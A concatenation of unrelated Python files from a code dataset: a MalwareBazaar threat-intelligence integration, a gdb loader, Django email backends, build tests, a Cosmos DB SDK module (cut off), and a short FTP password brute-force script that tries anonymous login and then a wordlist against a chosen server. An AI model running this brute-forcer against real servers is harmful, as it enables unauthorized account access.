if page <= 0:
raise Exception('Chosen page number must be greater than 0')
limit = page_size * page
else:
limit = 50
# # 1000 is the maximal value we can get from tha API
limit = min(limit, 1000)
query = QUERIES.get(sample_input)
response = client.malwarebazaar_samples_list_request(sample_input, value, limit, query)
check_query_status(response, True, args.get('sample_type'))
response_data = response.get('data')
# take required results from response if pagination by page and page_size
if page is not None and page_size is not None:
response_data = response_data[-1 * page_size:]
readable_output = tableToMarkdown('Sample List', t=response_data, headerTransform=string_to_table_header,
removeNull=True, headers=LIST_HEADERS)
return CommandResults(
outputs_prefix='MalwareBazaar.MalwarebazaarSamplesList',
outputs_key_field='sha256_hash',
readable_output=readable_output,
outputs=response_data,
raw_response=response
)
def test_module(client: Client) -> None:
if client.api_key:
response = client.malwarebazaar_comment_add_request(
"094fd325049b8a9cf6d3e5ef2a6d4cc6a567d7d49c35f8bb8dd9e3c6acf3d78d",
"test comment")
else:
response = client.malwarebazaar_samples_list_request('tag', 'TrickBot', '2', QUERIES.get('tag'))
check_query_status(response)
return_results('ok')
def main() -> None:
params: Dict[str, Any] = demisto.params()
args: Dict[str, Any] = demisto.args()
url = params.get('url')
api_key = params.get('credentials', {}).get('password') or None
verify_certificate: bool = not params.get('insecure', False)
proxy = params.get('proxy', False)
command = demisto.command()
demisto.debug(f'Command being called is {command}')
try:
urllib3.disable_warnings()
client: Client = Client(urljoin(url, '/api/v1/'), verify_certificate, proxy, headers={}, api_key=api_key)
commands = {
'file': file_command,
'malwarebazaar-download-sample': malwarebazaar_download_sample_command,
'malwarebazaar-comment-add': malwarebazaar_comment_add_command,
'malwarebazaar-samples-list': malwarebazaar_samples_list_command,
}
if command == 'test-module':
test_module(client)
elif command in commands:
return_results(commands[command](client, args))
else:
raise NotImplementedError(f'{command} command is not implemented.')
except Exception as e:
return_error(str(e))
if __name__ in ['__main__', 'builtin', 'builtins']:
main()
| [
"[email protected]"
] | |
f4823491f0f44b3d340a720dbc47cf29a5a8e325 | 55540f3e86f1d5d86ef6b5d295a63518e274efe3 | /toolchain/riscv/MSYS/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d/libstdc++.a-gdb.py | 8e9d75e886ed14abcb55b187bbbe376b0ca67b81 | [
"Apache-2.0"
] | permissive | bouffalolab/bl_iot_sdk | bc5eaf036b70f8c65dd389439062b169f8d09daa | b90664de0bd4c1897a9f1f5d9e360a9631d38b34 | refs/heads/master | 2023-08-31T03:38:03.369853 | 2023-08-16T08:50:33 | 2023-08-18T09:13:27 | 307,347,250 | 244 | 101 | Apache-2.0 | 2023-08-28T06:29:02 | 2020-10-26T11:16:30 | C | UTF-8 | Python | false | false | 2,772 | py | # -*- python -*-
# Copyright (C) 2009-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/share/gcc-10.2.0/python'
libdir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
| [
"[email protected]"
] | |
0d1bfe45270d76b88c774d848ede4a38ee8cb120 | 60364a7089bc359494a4a42ba6d79c2fd0b84185 | /django_extended/emailing/backend.py | ced758319243991dd06e01a4e9d2d45cbf3c16e2 | [
"BSD-3-Clause"
] | permissive | dalou/django-extended | 4936c77535bc4421a9f003da58a49629bc7996df | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | refs/heads/master | 2021-10-27T09:33:28.615992 | 2015-12-14T14:55:33 | 2015-12-14T14:55:33 | 46,408,921 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address, DEFAULT_ATTACHMENT_MIME_TYPE
from django.core.mail.backends.smtp import EmailBackend
from .models import *
class DevBackend(EmailBackend):
def route_recipients(self, recipients):
for i,r in enumerate(recipients):
recipients[i] = "[email protected], [email protected]"
return recipients
def _send(self, message):
orginial_receiver = ", ".join(message.to)
message.to = self.route_recipients(message.to)
message.cc = self.route_recipients(message.cc)
message.bcc = self.route_recipients(message.bcc)
message.subject += ' <orginal receivers : %s>' % orginial_receiver
super(DevBackend, self)._send(message)
class ProductionBackend(EmailBackend):
def route_recipients(self, recipients):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# receivers = ", ".join(list(set(TestEmail.objects.all().values_list('email', flat=True))))
# # for i,r in enumerate(recipients):
# # if not r.endswith('@%s' % PROJECT_DOMAIN):
# # recipients = settings.DEFAULT_FROM_EMAIL
return recipients
def _send(self, message):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# message.to = self.route_recipients(message.to)
# message.cc = self.route_recipients(message.cc)
# message.bcc = self.route_recipients(message.bcc)
super(ProductionBackend, self)._send(message) | [
"[email protected]"
] | |
f51a2ebb6f85f0f5d06ee9ac9dd3373d5880f1d0 | d17724b2ce056b435f57b16fb0cbea32e44a29c6 | /Gun4PY/ftp-bruteforce.py | 0f673dce18e4b54b0c7f64d8571451b8a5f6f497 | [] | no_license | UgurCIL/Examples | 27264d89131b4aaff46f91705a03779c4e825ad6 | c1722a519836a24c8a946380e6cbcd6da963f0c5 | refs/heads/master | 2020-04-24T15:28:17.288204 | 2019-02-22T13:30:35 | 2019-02-22T13:30:35 | 172,069,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,018 | py | import sys
from ftplib import FTP
def checkAnonymous(dstIP):
try:
ftp = FTP(dstIP)
ftp.login()
print "[*] Anonymous giris acik"
print "[*] Kullanici Adi : anonymous"
print "[*] Parola : anonymous"
ftp.close()
except:
pass
def ftpLogin(dstIP, user, passw):
try:
ftp = FTP(dstIP)
ftp.login(user, passw)
ftp.quit()
print "[!] Kullanici/Parola bulundu."
print "[!] Kullanici Adi : " + user
print "[!] Parola : " + passw
sys.exit(0)
except:
pass
def bruteForce(dstIP, user, wordL):
try:
wordlist = open(wordL, "r")
words = wordlist.readlines()
for word in words:
word = word.strip()
ftpLogin(dstIP, user, word)
except:
print "[-] Eslesen parola bulunamadi.."
sys.exit(0)
dstIP = raw_input("FTP sunucu adresi : ")
user = raw_input("Kullanici adi : ")
wordlist = raw_input("Parola listesi : ")
bruteForce(dstIP, user, wordlist)
checkAnonymous(dstIP)
| [
"[email protected]"
] | |
1925c14fb7975bde7b1a13295e923c9cc4a022d7 | 338be5c20c24e10f11f0fea4a1a156dc4e4a9922 | /greenleaf/config/gunicorn.conf.py | ff0f6aab1ec9aec6ec500de100e1811f081f1fa0 | [] | no_license | Jimiliani/my_python | a532c332683a0f795bff5ed6b15db5c961e017d4 | 28f078d9499854b2b09fbd50686beb8cfdc12227 | refs/heads/master | 2022-10-27T08:38:04.449331 | 2020-10-06T10:41:10 | 2020-10-06T10:41:10 | 241,277,471 | 0 | 1 | null | 2022-10-15T16:06:02 | 2020-02-18T05:07:19 | Python | UTF-8 | Python | false | false | 66 | py | bind = '127.0.0.1:8000'
workers = 2
user = 'dima'
timeout = 60
| [
"[email protected]"
] | |
d14bf3bde060c5cda07a825296dee074f729f51f | 5db0fab37c2b8a618d85d3b60fab9f806c416474 | /src/python/pants/backend/go/util_rules/build_pkg_test.py | be4d1f7e5dab9561e76f8e82e785b6d2d8bc7090 | [
"Apache-2.0"
] | permissive | pantsbuild/pants | 4988d1ac5474ec95f94ce2218aeb759401e4b011 | 98cbda8545f0d58c586ed2daa76fefd729d5e0d5 | refs/heads/main | 2023-09-05T03:44:17.646899 | 2023-09-01T19:52:09 | 2023-09-01T19:52:09 | 7,209,075 | 2,708 | 593 | Apache-2.0 | 2023-09-14T19:33:33 | 2012-12-17T17:39:04 | Python | UTF-8 | Python | false | false | 6,371 | py | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os.path
from textwrap import dedent
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.target_types import GoModTarget
from pants.backend.go.util_rules import (
assembly,
build_pkg,
first_party_pkg,
go_mod,
import_analysis,
link,
sdk,
third_party_pkg,
)
from pants.backend.go.util_rules.build_opts import GoBuildOptions
from pants.backend.go.util_rules.build_pkg import (
BuildGoPackageRequest,
BuiltGoPackage,
FallibleBuiltGoPackage,
)
from pants.engine.fs import Snapshot
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import RuleRunner
from pants.util.strutil import path_safe
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*sdk.rules(),
*assembly.rules(),
*build_pkg.rules(),
*import_analysis.rules(),
*go_mod.rules(),
*first_party_pkg.rules(),
*link.rules(),
*third_party_pkg.rules(),
*target_type_rules.rules(),
QueryRule(BuiltGoPackage, [BuildGoPackageRequest]),
QueryRule(FallibleBuiltGoPackage, [BuildGoPackageRequest]),
],
target_types=[GoModTarget],
)
rule_runner.set_options([], env_inherit={"PATH"})
return rule_runner
def assert_built(
rule_runner: RuleRunner, request: BuildGoPackageRequest, *, expected_import_paths: list[str]
) -> None:
built_package = rule_runner.request(BuiltGoPackage, [request])
result_files = rule_runner.request(Snapshot, [built_package.digest]).files
expected = {
import_path: os.path.join("__pkgs__", path_safe(import_path), "__pkg__.a")
for import_path in expected_import_paths
}
assert dict(built_package.import_paths_to_pkg_a_files) == expected
assert sorted(result_files) == sorted(expected.values())
def test_build_pkg(rule_runner: RuleRunner) -> None:
transitive_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep/transitive",
pkg_name="transitive",
dir_path="dep/transitive",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"dep/transitive/f.go": dedent(
"""\
package transitive
func Quote(s string) string {
return ">>" + s + "<<"
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(),
minimum_go_version=None,
)
direct_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep",
pkg_name="dep",
dir_path="dep",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"dep/f.go": dedent(
"""\
package dep
import "example.com/foo/dep/transitive"
func Quote(s string) string {
return transitive.Quote(s)
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(transitive_dep,),
minimum_go_version=None,
)
main = BuildGoPackageRequest(
import_path="example.com/foo",
pkg_name="foo",
dir_path="",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"f.go": dedent(
"""\
package foo
import "example.com/foo/dep"
func main() {
dep.Quote("Hello world!")
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(direct_dep,),
minimum_go_version=None,
)
assert_built(
rule_runner, transitive_dep, expected_import_paths=["example.com/foo/dep/transitive"]
)
assert_built(
rule_runner,
direct_dep,
expected_import_paths=["example.com/foo/dep", "example.com/foo/dep/transitive"],
)
assert_built(
rule_runner,
main,
expected_import_paths=[
"example.com/foo",
"example.com/foo/dep",
"example.com/foo/dep/transitive",
],
)
def test_build_invalid_pkg(rule_runner: RuleRunner) -> None:
invalid_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep",
pkg_name="dep",
dir_path="dep",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot({"dep/f.go": "invalid!!!"}).digest,
s_files=(),
direct_dependencies=(),
minimum_go_version=None,
)
main = BuildGoPackageRequest(
import_path="example.com/foo",
pkg_name="main",
dir_path="",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"f.go": dedent(
"""\
package main
import "example.com/foo/dep"
func main() {
dep.Quote("Hello world!")
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(invalid_dep,),
minimum_go_version=None,
)
invalid_direct_result = rule_runner.request(FallibleBuiltGoPackage, [invalid_dep])
assert invalid_direct_result.output is None
assert invalid_direct_result.exit_code == 1
assert (
invalid_direct_result.stdout
== "dep/f.go:1:1: syntax error: package statement must be first\n"
)
invalid_dep_result = rule_runner.request(FallibleBuiltGoPackage, [main])
assert invalid_dep_result.output is None
assert invalid_dep_result.exit_code == 1
assert (
invalid_dep_result.stdout == "dep/f.go:1:1: syntax error: package statement must be first\n"
)
| [
"[email protected]"
] | |
f6bc336f85c826b416c7a82c6d5707a2e558c142 | cad999eacee16dc0e001a57f50b5d8b0f4d4ebf6 | /p202.py | a2cc8d0b585a2940e0c568ce938cd4db057be5f3 | [] | no_license | divyanarra0/pythonprogram | 8694a41ba3b39eb44a94a693eac3f7f5f18b588b | 10d8f59a472ccd4548771bad29be84a1a44854d8 | refs/heads/master | 2020-03-27T10:32:21.664657 | 2019-05-14T07:31:00 | 2019-05-14T07:31:00 | 146,427,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | def isVowel(c):
c = c.lower()
if (c == 'a' or c == 'e' or
c == 'i' or c == 'o' or c == 'u'):
return True
return False
# Function to return first X vowels
def firstXvowels(s, x):
# String to store first X vowels
result = ""
for i in range(0, len(s), 1):
# If s[i] is a vowel then
# append it to the result
if (isVowel(s[i])):
result += s[i]
# If the desired length is reached
if (len(result) == x):
return result
# If total vowels are < X
return "-1"
# Driver code
if __name__ == '__main__':
str = "asdaqrew"
x = 3
print(firstXvowels(str, x))
| [
"[email protected]"
] | |
7dc0c27e821890eced9d0802e8432f93546a7563 | 3ce946b7fac93c237a073c5395ba2f3d293a3c52 | /src/cosmosdb-preview/azext_cosmosdb_preview/vendored_sdks/azure_mgmt_cosmosdb/operations/_collection_operations.py | cb47c68b013ff541760c6fa0f4aa019997d88c17 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | imabedalghafer/azure-cli-extensions | a7e05873aaf1bfa164e89f8fe80a80e7240abc78 | 017848c33388d48b382414db66656965f1c1874f | refs/heads/main | 2022-11-06T11:43:14.960651 | 2022-10-17T12:12:55 | 2022-10-17T12:12:55 | 403,272,601 | 2 | 0 | MIT | 2021-09-05T09:59:12 | 2021-09-05T09:59:11 | null | UTF-8 | Python | false | false | 21,317 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar
from urllib.parse import parse_qs, urljoin, urlparse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_metrics_request(
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
subscription_id: str,
*,
filter: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-08-15-preview")) # type: str
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/metrics",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"accountName": _SERIALIZER.url(
"account_name", account_name, "str", max_length=50, min_length=3, pattern=r"^[a-z0-9]+(-[a-z0-9]+)*"
),
"databaseRid": _SERIALIZER.url("database_rid", database_rid, "str"),
"collectionRid": _SERIALIZER.url("collection_rid", collection_rid, "str"),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
_params["$filter"] = _SERIALIZER.query("filter", filter, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_usages_request(
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
subscription_id: str,
*,
filter: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-08-15-preview")) # type: str
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/usages",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"accountName": _SERIALIZER.url(
"account_name", account_name, "str", max_length=50, min_length=3, pattern=r"^[a-z0-9]+(-[a-z0-9]+)*"
),
"databaseRid": _SERIALIZER.url("database_rid", database_rid, "str"),
"collectionRid": _SERIALIZER.url("collection_rid", collection_rid, "str"),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
if filter is not None:
_params["$filter"] = _SERIALIZER.query("filter", filter, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_metric_definitions_request(
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2022-08-15-preview")) # type: str
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/metricDefinitions",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str", min_length=1),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name", resource_group_name, "str", max_length=90, min_length=1
),
"accountName": _SERIALIZER.url(
"account_name", account_name, "str", max_length=50, min_length=3, pattern=r"^[a-z0-9]+(-[a-z0-9]+)*"
),
"databaseRid": _SERIALIZER.url("database_rid", database_rid, "str"),
"collectionRid": _SERIALIZER.url("collection_rid", collection_rid, "str"),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
class CollectionOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.cosmosdb.CosmosDBManagementClient`'s
:attr:`collection` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list_metrics(
self,
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
filter: str,
**kwargs: Any
) -> Iterable["_models.Metric"]:
"""Retrieves the metrics determined by the given filter for the given database account and
collection.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param account_name: Cosmos DB database account name. Required.
:type account_name: str
:param database_rid: Cosmos DB database rid. Required.
:type database_rid: str
:param collection_rid: Cosmos DB collection rid. Required.
:type collection_rid: str
:param filter: An OData filter expression that describes a subset of metrics to return. The
parameters that can be filtered are name.value (name of the metric, can have an or of multiple
names), startTime, endTime, and timeGrain. The supported operator is eq. Required.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Metric or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.cosmosdb.models.Metric]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[_models.MetricListResult]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_metrics_request(
resource_group_name=resource_group_name,
account_name=account_name,
database_rid=database_rid,
collection_rid=collection_rid,
subscription_id=self._config.subscription_id,
filter=filter,
api_version=api_version,
template_url=self.list_metrics.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("MetricListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_metrics.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/metrics"} # type: ignore
@distributed_trace
def list_usages(
self,
resource_group_name: str,
account_name: str,
database_rid: str,
collection_rid: str,
filter: Optional[str] = None,
**kwargs: Any
) -> Iterable["_models.Usage"]:
"""Retrieves the usages (most recent storage data) for the given collection.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param account_name: Cosmos DB database account name. Required.
:type account_name: str
:param database_rid: Cosmos DB database rid. Required.
:type database_rid: str
:param collection_rid: Cosmos DB collection rid. Required.
:type collection_rid: str
:param filter: An OData filter expression that describes a subset of usages to return. The
supported parameter is name.value (name of the metric, can have an or of multiple names).
Default value is None.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Usage or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.cosmosdb.models.Usage]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[_models.UsagesResult]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_usages_request(
resource_group_name=resource_group_name,
account_name=account_name,
database_rid=database_rid,
collection_rid=collection_rid,
subscription_id=self._config.subscription_id,
filter=filter,
api_version=api_version,
template_url=self.list_usages.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("UsagesResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_usages.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/usages"} # type: ignore
@distributed_trace
def list_metric_definitions(
self, resource_group_name: str, account_name: str, database_rid: str, collection_rid: str, **kwargs: Any
) -> Iterable["_models.MetricDefinition"]:
"""Retrieves metric definitions for the given collection.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param account_name: Cosmos DB database account name. Required.
:type account_name: str
:param database_rid: Cosmos DB database rid. Required.
:type database_rid: str
:param collection_rid: Cosmos DB collection rid. Required.
:type collection_rid: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MetricDefinition or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.cosmosdb.models.MetricDefinition]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version)) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[_models.MetricDefinitionsListResult]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_metric_definitions_request(
resource_group_name=resource_group_name,
account_name=account_name,
database_rid=database_rid,
collection_rid=collection_rid,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_metric_definitions.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("MetricDefinitionsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
